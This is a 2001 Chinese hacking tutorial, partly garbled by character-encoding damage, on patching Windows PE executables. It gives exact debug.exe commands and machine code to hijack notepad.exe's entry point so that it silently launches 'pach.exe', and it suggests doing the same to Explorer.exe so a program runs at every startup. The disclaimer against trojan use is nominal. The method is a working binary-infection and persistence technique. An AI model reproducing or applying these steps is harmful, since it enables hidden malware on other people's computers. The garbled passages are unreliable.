/t --------給PE文件打補(bǔ)丁--------
/t/t ------njhhack
我們都知道在PE文件中有很多空隙���,所以我們就有可能給PE文件打補(bǔ)丁.
做法是在空隙中插入我們的補(bǔ)丁代碼.
下面我通過實(shí)例來教大家給win97的notepad.exe(記事本)程序來打個(gè)補(bǔ)
丁�,使得notepad.exe運(yùn)行時(shí)先運(yùn)行我的pach.exe程序�,方法是:
1.在notepad.exe的section間隙中插入
/t ShellExecute(0,'open','pach.exe',0,0,5)這個(gè)api函數(shù)調(diào)用
2.后面加入jmp old_begin來跳回原來的程序啟動(dòng)點(diǎn)執(zhí)行原來的代碼
3.修改程序的入口點(diǎn)為新的入口點(diǎn)
經(jīng)過這三步操作后���,你就為notepad.exe程序打上了補(bǔ)丁����,以后每次執(zhí)行notepad.exe
都會(huì)先執(zhí)行pach.exe程序了.
聽起來很簡單����,做起來麻煩,我們來看看如何實(shí)際操作吧!
首先我們需要有個(gè)debug.exe用來修改notepad.exe程序的內(nèi)容��,這是windows
自帶的���,你不用費(fèi)事找的,當(dāng)然你要分析pe文件的結(jié)構(gòu)和他的反匯編指令的話還要一
個(gè)dumppe.exe程序��,他是masm32匯編器自帶的一個(gè)免費(fèi)程序�,功能強(qiáng)大��,我們分析pe
格式和反匯編碼就用他了,如果你沒有這個(gè)程序也沒關(guān)系��,想要的話從這里下載就行
http://njhhack.top263.net/dumppe.zip當(dāng)然我們還要一個(gè)win97的操作系統(tǒng)�,因?yàn)?br />我們對他的notepad.exe程序打補(bǔ)丁.
好了,準(zhǔn)備好后�,我們開始工作了��,先把notepad.exe復(fù)制到c:.exe,c:
然后我們對n進(jìn)行手術(shù),首先我們分析n.exe的內(nèi)部結(jié)構(gòu),用dumppe -disasm n.exe>n.txt
好了���,n.txt中包含了我們要的所有信息,當(dāng)然我們只對下面的幾個(gè)內(nèi)容感興趣:
------------------------------------------------
Address of Entry Point/t/t 00001000
-------------------------------------------------
01 .text Virtual Address/t 00001000
Virtual Size/t 00003A9B/t
----------------------------------------------------
00402E20 FF1578734000/t call dword ptr [ShellExecuteA]
-----------------------------------------------------------------
上面這三部分信息分別是什么含義呢?
1.其中Address of Entry Point/t/t 00001000
表示程序的入口點(diǎn)為1000,這個(gè)很重要�����,因?yàn)槲覀兊某绦驁?zhí)行完后要跳回這個(gè)入口點(diǎn),
2.其中 01 .text Virtual Address/t 00001000
/t/t Virtual Size/t 00003A9B
表示代碼段的虛擬地址從1000開始,大小為3a9b,這個(gè)也很重要��,因?yàn)槲抑烂總€(gè)
section以200對齊,現(xiàn)在大小為3a9b,比對齊后的3c00要少���,所以代碼段有空隙�����,我們就可
以在此插入自已的代碼了,空隙的大小為3c00-3a9b=165大小,足夠了,
3.其中00402E20 FF1578734000/t call dword ptr [ShellExecuteA]
是一個(gè)反匯編代碼,我們了解到ShellExecuteA的調(diào)用的機(jī)器碼為FF1578734000,
有了上面這三個(gè)重要信息后����,我們開始最艱難的工作了:
=============================================================================
1.我們修改代碼段的大小,把Virtual Size的值由00003A9B改為00003C00,這樣
我們的代碼才能被裝入內(nèi)存.因?yàn)閂irtual Size值存在180的位置,所以我們可以這么做:
debug n ?L
-f280 l2 0,3c
-w
-q
這樣我們就改好了代碼段的大小
2.我們修改程序的入口地址為3a9d+1000=4a9d,方法如下
因?yàn)槿肟诘刂吩赼8這個(gè)位置,所以這么做
debug n ?L
-f1a8 l2 9d,4a
-w
-q
這樣我們修改好了入口地址
3.最后一步最難了�����,就是設(shè)計(jì)匯編代碼了�,來吧����,精神點(diǎn)!
-------------------------------------------------------
內(nèi)存地址 機(jī)器碼/t/t 匯編指令
-------------------------------------------------------
00404A9D 6A05/t/t push 5
00404A9F 6A00/t/t push 0
00404AA1 6A00/t/t push 0
00404AA3 68E04B4000/t push 404BE0h
00404AA8 68F04B4000/t push 404BF0h
00404AAD 6A00/t/t push 0
00404AAF FF1578734000/t call dword ptr [ShellExecuteA]
00404AB5 E941010000/t jmp loc_00404BFB
00404BE0 6861636B2E657865 db 'pach.exe',0
00404BF0 6F70656E/t db 'open',0
00404BFB E900C4FFFF/t jmp loc_00401000
--------------------------------------------------------------
這就是我們要寫的全部匯編指令��,不長�����,但你要懂他的原理,好吧�����,我們來分析
其中的
push 5
push 0
push 0
push 404BE0h
push 404BF0h
push 0
是把6個(gè)參數(shù)壓入堆棧�����,供ShellExecute函數(shù)使用,至于該函數(shù)的參數(shù)結(jié)構(gòu)�,大家看win32.hlp的描述
然后call dword ptr [ShellExecuteA]這是調(diào)用這個(gè)函數(shù)了,其效果等同于下面的C語言格式
ShellExecuteA(0,'open','pach.exe',0,0,5);
也就是說最先壓入堆棧的參數(shù)在函數(shù)的最右邊,其中'open','pach.exe'分別相當(dāng)于404BE0h,404BF0h
這兩個(gè)內(nèi)存地址,因?yàn)樵谠摵瘮?shù)中���,字符串參數(shù)的傳遞是傳的字符串地址����,因此
00404BE0 6861636B2E657865 db 'pach.exe',0
00404BF0 6F70656E/t db 'open',0
這上面兩行就是在內(nèi)存中定義了兩個(gè)字符串.
00404AB5 E941010000/t jmp loc_00404BFB
上面這行是在call 完函數(shù)后跳到00404BFB這個(gè)地址.
00404BFB E900C4FFFF/t jmp loc_00401000
這一行是跳回原來的入口地址1000���,執(zhí)行原來的程序.
-----------------------------------------------------------------
好了�,原理講完了�,我們最后要把這些指令放入代碼段���,當(dāng)然就是把機(jī)器碼放進(jìn)去了,方
法如下:
因?yàn)榇a段在400位置��,而我們新入口點(diǎn)在3b9d����,所以開始放數(shù)的地方是100+400+3a9d=3f9d
其中加的100是debug在內(nèi)存中的基地址,所以做法如下:
debug n ?L
-f3f9d l1d 6a,5,6a,0,6a,0,68,e0,4b,40,0,68,f0,4b,40,0,6a,0,ff,15,78,73,40,0,e9,41,1,0,0
-f40e0 l9 'pach.exe',0
-f40f0 l5 'open',0
-f40fb l5 e9,0,c4,ff,ff
-w
-q
好了,我們終于完成了最艱難的任務(wù)����,可以頎賞一下成果了,把n.exe用n代換�����,方法為copy n n.exe打開n.exe
我們發(fā)現(xiàn)�����,在啟動(dòng)記事本程序的時(shí)候�,同時(shí)打開了pach.exe這個(gè)程序�,呵呵,我們終于成功了
想看效果�,到這里下載njhhack.top263.net/pach.zip這個(gè)不是木馬,是演示程序����,大家不要害怕
---------------------------------------------------
用同樣的方法�,你可以給任何程序打補(bǔ)丁���,只要他在程序中調(diào)用了ShellExecute,WinExec,CreateProcess,...
這些函數(shù)就行,比如我們可以給Explorer.exe打補(bǔ)丁�,這樣我們就可以在啟動(dòng)電腦時(shí),自動(dòng)運(yùn)行pach.exe程序了
你還可以給很多這樣的程序打補(bǔ)丁����,只要你愿意.
現(xiàn)在大家知道匯編語言有多有用了吧��,以后好好學(xué)吧�����,當(dāng)然還要學(xué)pe文件的格式喲,不過本人在此告誡
大家不要用這個(gè)補(bǔ)丁技術(shù)來啟動(dòng)你的木馬程序��,若不聽勸告�����,引起的后果與本人無關(guān).
/t/t/t/t ------njhhack
/t/t/t/t 2001.8.25
/t/t/t e-mail:njhhack@21cn.com
/t/t/t oicq:10772919
/t/t/t 主頁:hotsky.363.net
